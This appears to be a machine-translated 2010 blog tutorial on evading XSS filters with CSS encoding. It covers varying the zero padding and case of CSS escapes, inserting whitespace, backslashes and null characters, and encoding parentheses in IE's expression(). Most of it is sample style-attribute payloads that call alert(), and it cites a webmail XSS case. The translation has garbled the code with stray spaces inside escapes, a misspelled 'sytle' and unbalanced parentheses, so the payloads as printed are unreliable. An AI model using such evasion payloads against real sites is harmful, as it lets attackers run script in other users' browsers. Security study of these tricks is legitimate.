Encoding and backslash are also basic methods to be mastered in XSS vulnerability mining. Here we provide three techniques for XSS vulnerability mining that use CSS encoding and backslash.
Author & Translator: www.pulog.org
2010/07/17
Tip 1: change the number of 0 encoded values (\ 0X-> \ 00000X ).
Example: <p style = "xss: \ 65 xpression (alert (/wpulog/)">
<P style = "xss: \ 065 xpression (alert (/wpulog/)">
<P style = "xss: \ 0065 xpression (alert (/wpulog/)">
The results are the same.
Tip 2: Change the case sensitivity of the encoded characters (\ 0A-> \ 0a ).
Example: <p style = "xss: expression (alert (/wpulog/) \ x0d">
<P style = "xss: expression (alert (/wpulog/) \ x0D">
The results are the same.
Tip 3: Add a blank character (IE supports \ x20, \ x09; FF and Opera Support \ x0A, \ x0D) behind the encoded characters ).
For example, in IE, <p sytle = "xss: \ 65 xpression (alert (/wpulog/)"> can also run, with spaces between \ 65 and x.
In addition, adding a backslash before a letter in CSS will be ignored. For example, \ x is equivalent to x, and \ n is not equal to n. You can also add a backslash before the line break (\ x0A, \ X0D) in Firefox, for example, <div style = "xx:
\
Gg ">
In IE, the CSS attribute value can be inserted with an empty character (\ 0). For example, the Netease mailbox Webmail XSS Vulnerability
<P style = "xss: ex & #00; pression (alert (/wpulog/)">.
Different browsers may support different encoding methods. For example, Firefox does not support encoding of parentheses. IE supports parentheses, for example, <p style = "xss: expression \ 28alert \ 28/wpulog/\ 29 \ 29"> which can be normally executed in IE.
These techniques can be used in combination with other encoding methods, and may receive unexpected results in XSS vulnerability mining.
[+] Reference:
~~~~~~~~~
Http://heideri.ch/jso/#61